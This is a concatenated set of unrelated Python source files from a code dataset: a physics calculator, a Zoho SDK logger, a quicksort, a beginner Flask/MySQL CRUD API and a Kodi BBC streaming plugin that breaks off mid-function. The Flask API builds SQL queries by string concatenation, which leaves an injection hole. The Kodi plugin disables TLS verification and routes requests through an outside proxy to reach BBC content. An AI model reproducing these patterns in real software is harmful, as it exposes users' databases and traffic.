assign total altitude to counter variable\n\n grav_new = calcGravity(alt_inc) # initial gravity at 0 velocity\n\n time_inc = 0 # time increment in fractions of seconds\n time_total = 0 # time totaled from increments\n\n vel_inc = calcVelocity(grav_new, time_inc) # velocity at each step\n vel_total = 0 # total velocity summed from acceleration operations\n\n while (alt_inc > 0):\n # import pdb; pdb.set_trace() # start debug\n\n # find time taken to travel iter given grav_new\n time_inc = calcTime(time_inc, iter, grav_new, vel_inc)\n\n # add time increment to total\n time_total += time_inc\n\n # find new altitude\n alt_inc -= iter\n\n # re-evaluate gravity at new altitude\n grav_new = calcGravity(alt_inc)\n\n vel_inc = calcVelocity(grav_new, time_inc)\n\n vel_total += vel_inc\n\n inc_count += 1\n\n # if (inc_count < 10):\n # print(time_inc, \"\\n\", time_total)\n # /while\n\n printOutput(alt, iter, time_total, vel_total, inc_count)\n# /main\n\nmain(sys.argv[1], sys.argv[2])\n\n# py timeforacceleration.py .1 400\n","repo_name":"thespacemans/misc_stuff","sub_path":"FreefallCalc/timeforaccelerationv2.py","file_name":"timeforaccelerationv2.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14690185032","text":"try:\n import logging\n from zcrmsdk.src.com.zoho.crm.api.exception.sdk_exception import SDKException\n from ...crm.api.util.constants import Constants\nexcept:\n from ...crm.api.util.constants import Constants\n from zcrmsdk.src.com.zoho.crm.api.exception import SDKException\n\n\nclass Logger(object):\n\n \"\"\"\n This class represents the Logger level and the file path.\n \"\"\"\n\n def __init__(self, level, file_path=None):\n self.__level = level\n self.__file_path = file_path\n\n def get_level(self):\n \"\"\"\n This is a getter method to get __level.\n\n Returns:\n string: A enum representing __level\n \"\"\"\n\n return self.__level\n\n def get_file_path(self):\n \"\"\"\n This is a getter method to get __file_path.\n\n Returns:\n string: A string representing __file_path\n \"\"\"\n\n return self.__file_path\n\n @staticmethod\n def get_instance(level, file_path=None):\n\n \"\"\"\n Creates an Logger class instance with the specified log level and file path.\n :param level: A Levels class instance containing the log level.\n :param file_path: A str containing the log file path.\n :return: A Logger class instance.\n \"\"\"\n\n return Logger(level=level, file_path=file_path)\n\n import enum\n\n class Levels(enum.Enum):\n\n \"\"\"\n This class represents the possible logger levels\n \"\"\"\n\n CRITICAL = logging.CRITICAL\n ERROR = logging.ERROR\n WARNING = logging.WARNING\n INFO = logging.INFO\n DEBUG = logging.DEBUG\n NOTSET = logging.NOTSET\n\n\nclass SDKLogger(object):\n\n \"\"\"\n The class to initialize the SDK logger.\n \"\"\"\n\n def __init__(self, logger_instance):\n\n logger = logging.getLogger('SDKLogger')\n logger_level = logger_instance.get_level()\n logger_file_path = logger_instance.get_file_path()\n if logger_level is not None and logger_level != logging.NOTSET and logger_file_path is not None and logger_file_path != \"\":\n file_handler = logging.FileHandler(logger_file_path)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(module)s - %(filename)s - %(funcName)s - %(lineno)d - %(message)s')\n file_handler.setLevel(logger_level.name)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n if logger_level is not None and 
logger_level.name in Constants.LOGGER_LEVELS:\n logger.setLevel(logger_level.name)\n\n @staticmethod\n def initialize(logger_instance):\n try:\n SDKLogger(logger_instance=logger_instance)\n except Exception as ex:\n raise SDKException(message=Constants.LOGGER_INITIALIZATION_ERROR, Exception=ex)\n","repo_name":"zoho/zohocrm-python-sdk-2.1","sub_path":"zcrmsdk/src/com/zoho/api/logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"35850359968","text":"# -*- coding: utf-8 -*-\n\n#Use Quicksort to sort given collection by desired coordinate\ndef partition(alist, i):\n count = 0\n li = [] \n mid_pos = (len(alist)+1)//2\n mid_element = alist[mid_pos-1]\n if alist[0][i] < mid_element[i] < alist[-1][i] \\\n or alist[-1][i] < mid_element[i] < alist[0][i]:\n alist[0], alist[mid_pos-1] = alist[mid_pos-1], alist[0]\n if alist[0][i] < alist[-1][i] < mid_element[i] \\\n or mid_element[i] < alist[-1][i] < alist[0][i]:\n alist[0], alist[-1] = alist[-1], alist[0]\n start = 0\n pivot = alist[start]\n pindex = start+1\n for j in range(start+1, len(alist)):\n count = count + 1\n if alist[j][i] < pivot[i]:\n alist[j], alist[pindex] = alist[pindex], alist[j]\n pindex += 1\n li.append(count)\n alist[start], alist[pindex-1] = alist[pindex-1], alist[start]\n return alist[:pindex], alist[pindex:]\n\ndef quicksort(alist, i):\n start = 0\n end = len(alist)-1\n if start msgcount:\n bigperson = key\n msgcount = value\n\nprint(bigperson, msgcount)\n","repo_name":"samtaitai/py4e","sub_path":"exercise0904.py","file_name":"exercise0904.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73172410348","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer, Serializer\n\nfrom .models import Accounts\n\nclass AccountSerializer(ModelSerializer):\n\n class Meta:\n model = Accounts\n fields = (\n 'id',\n 'label',\n )\n read_only_fields = (\n 'id',\n )\n","repo_name":"ashraful-ic/accounts","sub_path":"accounts/transaction/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71925465067","text":"\nfrom flask import Flask, render_template, jsonify,request\nfrom flask_mysqldb import MySQL\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__) # global variables\ncors= CORS(app)\n\n# MySQL configuration\napp.config['CORS_HEADERS'] ='Content-Type'\napp.config['MYSQL_HOST']= 'localhost'\napp.config['MYSQL_USER']= 'root'\napp.config['MYSQL_PASSWORD']= ''\napp.config['MYSQL_DB']= 'system'\n\n# initialize\nmysql = MySQL(app)\n\n\n@app.route('/api/customers') # uses GET\n@cross_origin() # allows the API to be called from different ports and web pages\ndef getAllCustomers():\n\n cur=mysql.connection.cursor()\n cur.execute('SELECT * FROM customers')\n data = cur.fetchall() # fetch everything the query returned\n result= []\n for row in data:\n content = {\n 'id':row[0],\n 'Nombre' : row[1], \n 'Apellido':row[2], \n 'email' : row[3], \n 'telefono' :row[4] , \n 'direccion': row[5]\n }\n\n result.append(content)\n return jsonify(result) # jsonify converts the result to JSON\n \n\n
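# Illustrative usage of the endpoints below (host and port are assumptions taken\n# from the app.run call at the bottom of this file):\n# GET http://localhost:3000/api/customers -> JSON list of all customers\n# GET http://localhost:3000/api/customers/1 -> JSON object for the customer with id 1\n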
@app.route('/api/customers/<id>') # uses GET (as whenever we call a URL)\n@cross_origin()\ndef getCustomer(id): \n cur=mysql.connection.cursor()\n cur.execute('SELECT * FROM customers WHERE id ='+ str(id))\n data = cur.fetchall() # fetch everything the query returned\n content={}\n for row in data:\n content = {\n 'id':row[0],\n 'Nombre' : row[1], \n 'Apellido':row[2], \n 'email' : row[3], \n 'telefono' :row[4] , \n 'direccion': row[5]\n \n }\n \n return jsonify(content) # jsonify converts the result to JSON\n \n\n@app.route('/api/customers',methods=['POST']) # uses POST\n\n@cross_origin()\ndef createCustomer():\n\n\n if 'id' in request.json: # if the request carries an id, update; otherwise create\n updateCustomer()\n else:\n createCustomer()\n\n return 'ok' \n\ndef createCustomer(): # helper: the module-level name lookup in the route handler above resolves here\n cur= mysql.connection.cursor() # returns an object that lets us modify the DB\n cur.execute(\"INSERT INTO `customers` (`id`, `nombre`, `apellido`, `email`, `telefono`, `direccion`) VALUES (NULL, %s, %s, %s, %s, %s);\", \n (request.json['nombre'], request.json['apellido'], request.json['email'], request.json['telefono'], request.json['direccion']))\n mysql.connection.commit() # sends the queued statements to the DB\n return 'Customer Saved'\n\ndef updateCustomer(): \n cur= mysql.connection.cursor() # returns an object that lets us modify the DB\n cur.execute(\"UPDATE `customers` SET `nombre` = %s, `apellido` = %s, `email` = %s, `telefono` = %s, `direccion` = %s WHERE `customers`.`id` = %s;\",\n (request.json['nombre'], request.json['apellido'], request.json['email'], request.json['telefono'], request.json['direccion'], request.json['id'])) \n mysql.connection.commit() # sends the queued statements to the DB\n return 'Customer Saved'\n\n\n\n\n@app.route('/api/customers/<id>',methods=['DELETE']) # uses DELETE (the ID selects the one customer to remove instead of all of them; think of the WHERE in the DB)\n@cross_origin()\ndef removeCustomer(id):\n cur= mysql.connection.cursor() # returns an object that lets us modify the DB\n cur.execute(\"DELETE FROM `customers` WHERE `customers`.`id` = \"+str(id) +\";\") # convert the id (an int) to str and build the query dynamically, so any id can be passed\n mysql.connection.commit()\n return 'Customer Deleted'\n\n\n\n@app.route('/') # default route\n@cross_origin()\n\ndef index():\n return render_template('index.html')\n\n\n@app.route('/<path>/')\n@cross_origin()\ndef publicFile(path):\n return render_template(path)\n\n\nif __name__ == '__main__':\n app.run(None, 3000, True)","repo_name":"J-o-s-eandres/crud-flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32047469213","text":"# -*- coding: utf-8 -*-\n\nfrom xbmcswift2 import Plugin, ListItem\nfrom xbmcswift2 import actions\nimport xbmc,xbmcaddon,xbmcvfs,xbmcgui,xbmcplugin\nimport re\nimport requests,urllib\nimport os,sys\nimport xml.etree.ElementTree as ET\nimport base64\nimport datetime\nimport random\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nplugin = Plugin()\nbig_list_view = False\n\ndef log(v):\n xbmc.log(repr(v),xbmc.LOGERROR)\n\ndef get_icon_path(icon_name):\n addon_path = xbmcaddon.Addon().getAddonInfo(\"path\")\n return os.path.join(addon_path, 'resources', 'img', icon_name+\".png\")\n\ndef remove_formatting(label):\n label = re.sub(r\"\\[/?[BI]\\]\",'',label)\n label = 
re.sub(r\"\\[/?COLOR.*?\\]\",'',label)\n return label\n\ndef escape( str ):\n str = str.replace(\"'\",\"'\")\n str = str.replace(\"&\", \"&\")\n str = str.replace(\"<\", \"<\")\n str = str.replace(\">\", \">\")\n str = str.replace(\"\\\"\", \""\")\n return str\n\ndef unescape( str ):\n str = str.replace(\"<\",\"<\")\n str = str.replace(\">\",\">\")\n str = str.replace(\""\",\"\\\"\")\n str = str.replace(\"&\",\"&\")\n str = str.replace(\"'\",\"'\")\n str = str.replace(\"'\",\"'\")\n return str\n\ndef get(url,proxy=False):\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0'}\n if proxy:\n headers['Referer'] = 'http://www.justproxy.co.uk/'\n url = 'http://www.justproxy.co.uk/index.php?q=%s' % base64.b64encode(url)\n #log(url)\n try:\n #llog((\"GGG\",url))\n r = requests.get(url,headers=headers,verify=False)\n #llog((\"RRR\",r))\n except:\n return\n if r.status_code != requests.codes.ok:\n return\n html = r.content\n #log(html)\n return html\n\n@plugin.route('/reset_cached')\ndef reset_cached():\n cached = plugin.get_storage('cached')\n cached.clear()\n\n@plugin.route('/schedule//')\ndef schedule(url,name):\n data = get(url)\n schedule = ET.fromstring(data)\n days = schedule.findall(\"day\")\n items = []\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n for day in days:\n first = True\n broadcasts = day[0]\n for broadcast in broadcasts:\n pid = broadcast.find(\"pid\").text\n start = broadcast.find(\"start\").text\n if first:\n date = start[0:10]\n first = False\n items.append({\n 'label' : \"[COLOR yellow][B]%s[/B][/COLOR]\" % date,\n 'thumbnail' : get_icon_path(\"calendar\"),\n 'path' : '',\n 'is_playable' : False,\n })\n end = broadcast.find(\"end\").text\n programme = broadcast.find(\"programme\")\n is_available = programme.find(\"is_available_mediaset_pc_sd\").text\n pid = programme.find(\"pid\").text\n display_titles = programme.find(\"display_titles\")\n image = programme.find(\"image\")\n image_pid = image.find(\"pid\").text\n title = display_titles.find(\"title\").text\n subtitle = display_titles.find(\"subtitle\").text\n if subtitle == None:\n subtitle = \"\"\n else:\n subtitle = \"- %s\" % subtitle\n NAME = \"[COLOR dimgray]%s-%s[/COLOR] %s %s\" % (start[11:16],end[11:16],title,subtitle)\n episode_url = 'http://www.bbc.co.uk/iplayer/episode/%s' % pid\n thumbnail = 'https://ichef.bbci.co.uk/images/ic/336x189/%s.jpg' % image_pid\n play_name = \"%s %s\" % (title,subtitle)\n if is_available == \"1\":\n URL = plugin.url_for('play_episode',url=episode_url,name=play_name,thumbnail=thumbnail,action=action)\n NAME = \"[COLOR %s]%s[/COLOR]\" % (remove_formatting(plugin.get_setting('catchup.colour')),NAME)\n else:\n URL = plugin.url_for('schedule',url=url, name=name)\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add Favourite', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_favourite, name=play_name, url=episode_url, thumbnail=thumbnail, is_episode=True))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add to PVR', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_pvr, name=play_name, url=episode_url, thumbnail=thumbnail, is_episode=True))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('play_episode',url=episode_url,name=play_name,thumbnail=thumbnail,action=\"cache\"))))\n items.append({\n 'label' : NAME,\n 'thumbnail' : thumbnail,\n 'path' : URL,\n 
'is_playable' : autoplay,\n 'context_menu': context_items,\n })\n\n return items\n\n@plugin.route('/schedule_period///')\ndef schedule_period(url,name,thumbnail):\n items = []\n for period in [\"today\",\"tomorrow\",\"yesterday\",\"this_week\",\"next_week\",\"last_week\"]:\n icon = 'special://home/addons/plugin.audio.bbc/resources/img/%s.png' % id\n URL = url.replace('today',period)\n items.append({\n 'label' : \"%s - %s\" % (name,period.replace('_',' ').title()),\n 'thumbnail' : icon,\n 'path' : plugin.url_for('schedule',url=URL, name=name),\n 'is_playable' : False\n })\n return items\n\n@plugin.route('/schedules')\ndef schedules():\n channels = [\n ('bbc_one_hd', \"BBC One\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/hd/today.xml\"),\n ('bbc_two_hd', \"BBC Two\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/hd/today.xml\"),\n ('bbc_four_hd', \"BBC Four\", \"http://www.bbc.co.uk/bbcfour/programmes/schedules/today.xml\"),\n ('bbc_news24', \"BBC News\", \"http://www.bbc.co.uk/bbcnews/programmes/schedules/today.xml\"),\n ('bbc_parliament', \"BBC Parliament\", \"http://www.bbc.co.uk/bbcparliament/programmes/schedules/today.xml\"),\n ('cbbc_hd', \"CBBC\", \"http://www.bbc.co.uk/cbbc/programmes/schedules/today.xml\"),\n ('cbeebies_hd', \"CBeebies\", \"http://www.bbc.co.uk/cbeebies/programmes/schedules/today.xml\"),\n ('bbc_alba', \"Alba\", \"http://www.bbc.co.uk/bbcalba/programmes/schedules/today.xml\"),\n ('s4cpbs', \"S4C\", \"http://www.bbc.co.uk/s4c/programmes/schedules/today.xml\"),\n ('bbc_one_hd', \"BBC One Cambridgeshire\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/cambridge/today.xml\"),\n ('bbc_one_hd', \"BBC One Channel Islands\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/channel_islands/today.xml\"),\n ('bbc_one_hd', \"BBC One East\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/east/today.xml\"),\n ('bbc_one_hd', \"BBC One East Midlands\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/east_midlands/today.xml\"),\n ('bbc_one_hd', \"BBC One Yorks & Lincs\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/east_yorkshire/today.xml\"),\n ('bbc_one_hd', \"BBC One HD\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/hd/today.xml\"),\n ('bbc_one_hd', \"BBC One London\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/london/today.xml\"),\n ('bbc_one_hd', \"BBC One Northern Ireland\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/ni/today.xml\"),\n ('bbc_one_hd', \"BBC One Northern Ireland HD\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/ni_hd/today.xml\"),\n ('bbc_one_hd', \"BBC One North East & Cumbria\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/north_east/today.xml\"),\n ('bbc_one_hd', \"BBC One North West\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/north_west/today.xml\"),\n ('bbc_one_hd', \"BBC One Oxfordshire\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/oxford/today.xml\"),\n ('bbc_one_hd', \"BBC One Scotland\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/scotland/today.xml\"),\n ('bbc_one_hd', \"BBC One Scotland HD\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/scotland_hd/today.xml\"),\n ('bbc_one_hd', \"BBC One South\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/south/today.xml\"),\n ('bbc_one_hd', \"BBC One South East\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/south_east/today.xml\"),\n ('bbc_one_hd', \"BBC One South West\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/south_west/today.xml\"),\n ('bbc_one_hd', \"BBC One Wales\", 
\"http://www.bbc.co.uk/bbcone/programmes/schedules/wales/today.xml\"),\n ('bbc_one_hd', \"BBC One Wales HD\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/wales_hd/today.xml\"),\n ('bbc_one_hd', \"BBC One West\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/west/today.xml\"),\n ('bbc_one_hd', \"BBC One West Midlands\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/west_midlands/today.xml\"),\n ('bbc_one_hd', \"BBC One Yorkshire\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/yorkshire/today.xml\"),\n ('bbc_two_hd', \"BBC Two Wales\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/wales/today.xml\"),\n ('bbc_two_hd', \"BBC Two Scotland\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/scotland/today.xml\"),\n ('bbc_two_hd', \"BBC Two England\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/england/today.xml\"),\n ('bbc_two_hd', \"BBC Two Northern Ireland\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/ni/today.xml\"),\n ]\n items = []\n for id, name, url in channels:\n icon = 'special://home/addons/plugin.audio.bbc/resources/img/%s.png' % id\n items.append({\n 'label' : name,\n 'thumbnail' : icon,\n 'path' : plugin.url_for('schedule_period',url=url, name=name, thumbnail=icon),\n 'is_playable' : False\n })\n\n return items\n\n@plugin.route('/red_button')\ndef red_button():\n items = []\n device = 'abr_hdtv'\n provider = 'ak'\n for suffix in ['','b']:\n for i in range(1,25):\n id = \"sport_stream_%02d%s\" % (i,suffix)\n name = \"Red Button %02d%s\" % (i,suffix)\n url='http://a.files.bbci.co.uk/media/live/manifesto/audio_video/webcast/hls/uk/%s/%s/%s.m3u8' % (device, provider, id)\n icon = 'special://home/addons/plugin.audio.bbc/resources/img/red_button.png'\n if plugin.get_setting('autoplay') == 'true':\n items.append({\n 'label' : name,\n 'thumbnail' : icon,\n 'path' : url,\n 'is_playable' : True\n })\n else:\n items.append({\n 'label' : name,\n 'thumbnail' : icon,\n 'path' : plugin.url_for('live_list',url=url, name=name, thumbnail=icon),\n 'is_playable' : False\n })\n return items\n\n@plugin.route('/make_playlist')\ndef make_playlist():\n hd = [\n ('bbc_one_hd', 'BBC One'),\n ('bbc_two_hd', 'BBC Two'),\n ('bbc_four_hd', 'BBC Four'),\n ('cbbc_hd', 'CBBC'),\n ('cbeebies_hd', 'CBeebies'),\n ('bbc_one_scotland_hd', 'BBC One Scotland'),\n ('bbc_one_northern_ireland_hd', 'BBC One Northern Ireland'),\n ('bbc_one_wales_hd', 'BBC One Wales'),\n\n ]\n sd = [\n ('bbc_news24', 'BBC News Channel'),\n ('bbc_parliament', 'BBC Parliament'),\n ('bbc_alba', 'Alba'),\n ('s4cpbs', 'S4C'),\n ('bbc_two_scotland', 'BBC Two Scotland'),\n ('bbc_two_northern_ireland_digital', 'BBC Two Northern Ireland'),\n ('bbc_two_wales_digital', 'BBC Two Wales'),\n ('bbc_two_england', 'BBC Two England'),\n ('bbc_one_london', 'BBC One London'),\n ('bbc_one_cambridge', 'BBC One Cambridge'),\n ('bbc_one_channel_islands', 'BBC One Channel Islands'),\n ('bbc_one_east', 'BBC One East'),\n ('bbc_one_east_midlands', 'BBC One East Midlands'),\n ('bbc_one_east_yorkshire', 'BBC One East Yorkshire'),\n ('bbc_one_north_east', 'BBC One North East'),\n ('bbc_one_north_west', 'BBC One North West'),\n ('bbc_one_oxford', 'BBC One Oxford'),\n ('bbc_one_south', 'BBC One South'),\n ('bbc_one_south_east', 'BBC One South East'),\n ('bbc_one_west', 'BBC One West'),\n ('bbc_one_west_midlands', 'BBC One West Midlands'),\n ('bbc_one_yorks', 'BBC One Yorks')\n ]\n\n items = []\n\n device = 'abr_hdtv'\n provider = 'ak'\n urls = []\n for id, name in hd :\n 
url='http://a.files.bbci.co.uk/media/live/manifesto/audio_video/simulcast/hls/uk/%s/%s/%s.m3u8' % (device, provider, id)\n urls.append((name,url))\n device = 'hls_mobile_wifi'\n for id, name in sd :\n url='http://a.files.bbci.co.uk/media/live/manifesto/audio_video/simulcast/hls/uk/%s/%s/%s.m3u8' % (device, provider, id)\n urls.append((name,url))\n\n playlist = xbmcvfs.File('special://profile/addon_data/plugin.audio.bbc/BBC.m3u8','wb')\n playlist.write('#EXTM3U\\n')\n for name,url in urls:\n html = get(url)\n match=re.compile('#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=(.+?),CODECS=\"(.+?)\",RESOLUTION=(.+?)\\n(.+?)$',flags=(re.DOTALL | re.MULTILINE)).findall(html)\n for bandwidth,codec,resolution,stream_url in sorted(match, key=lambda x: int(x[0]), reverse=True):\n if bandwidth <= plugin.get_setting('live.bandwidth'):\n playlist.write('#EXTINF:0,%s\\n%s\\n' % (name,stream_url))\n break\n playlist.close()\n\n\n\n@plugin.route('/live')\ndef live():\n channel_list = [\n ('bbc_radio_one', 'BBC Radio 1'),\n ('bbc_1xtra', 'BBC Radio 1Xtra'),\n ('bbc_radio_two', 'BBC Radio 2'),\n ('bbc_radio_three', 'BBC Radio 3'),\n ('bbc_radio_fourfm', 'BBC Radio 4 FM'),\n ('bbc_radio_fourlw', 'BBC Radio 4 LW'),\n ('bbc_radio_four_extra', 'BBC Radio 4 Extra'),\n ('bbc_radio_five_live', 'BBC Radio 5 live'),\n ('bbc_radio_five_live_sports_extra', 'BBC Radio 5 live sports extra'),\n ('bbc_6music', 'BBC Radio 6 Music'),\n ('bbc_asian_network', 'BBC Asian Network'),\n ('bbc_radio_scotland_fm', 'BBC Radio Scotland'),\n ('bbc_radio_nan_gaidheal', u'BBC Radio nan Gàidheal'),\n ('bbc_radio_ulster', 'BBC Radio Ulster'),\n ('bbc_radio_foyle', 'BBC Radio Foyle'),\n ('bbc_radio_wales_fm', 'BBC Radio Wales'),\n ('bbc_radio_cymru', 'BBC Radio Cymru'),\n ('bbc_radio_berkshire', 'BBC Radio Berkshire'),\n ('bbc_radio_bristol', 'BBC Radio Bristol'),\n ('bbc_radio_cambridge', 'BBC Radio Cambridgeshire'),\n ('bbc_radio_cornwall', 'BBC Radio Cornwall'),\n ('bbc_radio_coventry_warwickshire', 'BBC Coventry & Warwickshire'),\n ('bbc_radio_cumbria', 'BBC Radio Cumbria'),\n ('bbc_radio_derby', 'BBC Radio Derby'),\n ('bbc_radio_devon', 'BBC Radio Devon'),\n ('bbc_radio_essex', 'BBC Essex'),\n ('bbc_radio_gloucestershire', 'BBC Radio Gloucestershire'),\n ('bbc_radio_guernsey', 'BBC Radio Guernsey'),\n ('bbc_radio_hereford_worcester', 'BBC Hereford & Worcester'),\n ('bbc_radio_humberside', 'BBC Radio Humberside'),\n ('bbc_radio_jersey', 'BBC Radio Jersey'),\n ('bbc_radio_kent', 'BBC Radio Kent'),\n ('bbc_radio_lancashire', 'BBC Radio Lancashire'),\n ('bbc_radio_leeds', 'BBC Radio Leeds'),\n ('bbc_radio_leicester', 'BBC Radio Leicester'),\n ('bbc_radio_lincolnshire', 'BBC Radio Lincolnshire'),\n ('bbc_london', 'BBC Radio London'),\n ('bbc_radio_manchester', 'BBC Radio Manchester'),\n ('bbc_radio_merseyside', 'BBC Radio Merseyside'),\n ('bbc_radio_newcastle', 'BBC Newcastle'),\n ('bbc_radio_norfolk', 'BBC Radio Norfolk'),\n ('bbc_radio_northampton', 'BBC Radio Northampton'),\n ('bbc_radio_nottingham', 'BBC Radio Nottingham'),\n ('bbc_radio_oxford', 'BBC Radio Oxford'),\n ('bbc_radio_sheffield', 'BBC Radio Sheffield'),\n ('bbc_radio_shropshire', 'BBC Radio Shropshire'),\n ('bbc_radio_solent', 'BBC Radio Solent'),\n ('bbc_radio_somerset_sound', 'BBC Somerset'),\n ('bbc_radio_stoke', 'BBC Radio Stoke'),\n ('bbc_radio_suffolk', 'BBC Radio Suffolk'),\n ('bbc_radio_surrey', 'BBC Surrey'),\n ('bbc_radio_sussex', 'BBC Sussex'),\n ('bbc_tees', 'BBC Tees'),\n ('bbc_three_counties_radio', 'BBC Three Counties Radio'),\n ('bbc_radio_wiltshire', 'BBC 
Wiltshire'),\n ('bbc_wm', 'BBC WM 95.6'),\n ('bbc_radio_york', 'BBC Radio York'),\n ]\n items = []\n for id, name in channel_list:\n location = \"uk\"\n quality = \"sbr_high\"\n provider_url = \"ak\"\n url = 'http://a.files.bbci.co.uk/media/live/manifesto/audio/simulcast/hls/%s/%s/%s/%s.m3u8' % (location, quality, provider_url, id)\n items.append({\n 'label' : name,\n 'thumbnail' : \"\",\n 'path' : url,\n 'is_playable' : True\n })\n return items\n\n\n@plugin.route('/play_live///')\ndef play_live(url,name,thumbnail):\n html = get(url)\n match=re.compile('#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=(.+?),CODECS=\"(.+?)\",RESOLUTION=(.+?)\\n(.+?)$',flags=(re.DOTALL | re.MULTILINE)).findall(html)\n for bandwidth,codec,resolution,url in sorted(match, key=lambda x: int(x[0]), reverse=True):\n #label = \"%s [%s bps] %s\" % (name,bandwidth,resolution)\n if bandwidth <= plugin.get_setting('live.bandwidth'):\n item = {\n 'label' : name,\n 'thumbnail' : thumbnail,\n 'path' : url,\n 'is_playable' : True\n }\n return plugin.set_resolved_url(item)\n\n@plugin.route('/live_list///')\ndef live_list(url,name,thumbnail):\n html = get(url)\n items = []\n match=re.compile('#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=(.+?),CODECS=\"(.+?)\",RESOLUTION=(.+?)\\n(.+?)$',flags=(re.DOTALL | re.MULTILINE)).findall(html)\n for bandwidth,codec,resolution,url in sorted(match, key=lambda x: int(x[0]), reverse=True):\n label = \"%s [%s bps] %s\" % (name,bandwidth,resolution)\n items.append({\n 'label' : label,\n 'thumbnail' : thumbnail,\n 'path' : url,\n 'is_playable' : True\n })\n return items\n\n@plugin.route('/proxy_play_episode////')\ndef proxy_play_episode(url,name,thumbnail,action):\n html = get(url)\n vpid = ''\n match = re.search(r'mediator.bind\\((.*?), document\\.getElementById\\(\\'tviplayer\\'\\)\\);', html, re.DOTALL)\n if match:\n data = match.group(1)\n import json\n json_data = json.loads(data)\n # print json.dumps(json_data, indent=2, sort_keys=True)\n name = json_data['episode']['title']\n description = json_data['episode']['synopses']['large']\n image = json_data['episode']['images']['standard'].replace('{recipe}','832x468')\n for stream in json_data['episode']['versions']:\n if ((stream['kind'] == 'original') or\n (stream['kind'] == 'iplayer-version')):\n vpid = stream_id_st = stream['id']\n\n if not vpid:\n return\n\n NEW_URL= \"http://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/apple-ipad-hls/vpid/%s\" % vpid\n html = get(NEW_URL,True)\n urls = []\n match=re.compile('application=\"(.+?)\".+?String=\"(.+?)\".+?identifier=\"(.+?)\".+?protocol=\"(.+?)\".+?server=\"(.+?)\".+?supplier=\"(.+?)\"').findall(html.replace('amp;',''))\n for app,auth , playpath ,protocol ,server,supplier in match:\n\n port = '1935'\n if protocol == 'rtmpt': port = 80\n if supplier == 'limelight':\n url=\"%s://%s:%s/ app=%s?%s tcurl=%s://%s:%s/%s?%s playpath=%s\" % (protocol,server,port,app,auth,protocol,server,port,app,auth,playpath)\n res = playpath.split('secure_auth/')[1]\n res = res.split('kbps')[0]\n urls.append([url,res])\n\n items = []\n for url,res in sorted(urls,key = lambda x: int(x[1]), reverse=True):\n\n items.append({\n 'label': \"%s [%s kbps]\" % (name, res),\n 'path': url,\n 'thumbnail': thumbnail,\n 'is_playable': True\n })\n\n return items\n\n@plugin.route('/start_pvr_service')\ndef start_pvr_service():\n xbmc.executebuiltin('XBMC.RunPlugin(plugin://plugin.audio.bbc/pvr_service)')\n\n@plugin.route('/pvr_service')\ndef pvr_service():\n pvrs = plugin.get_storage('pvrs')\n for name in pvrs:\n 
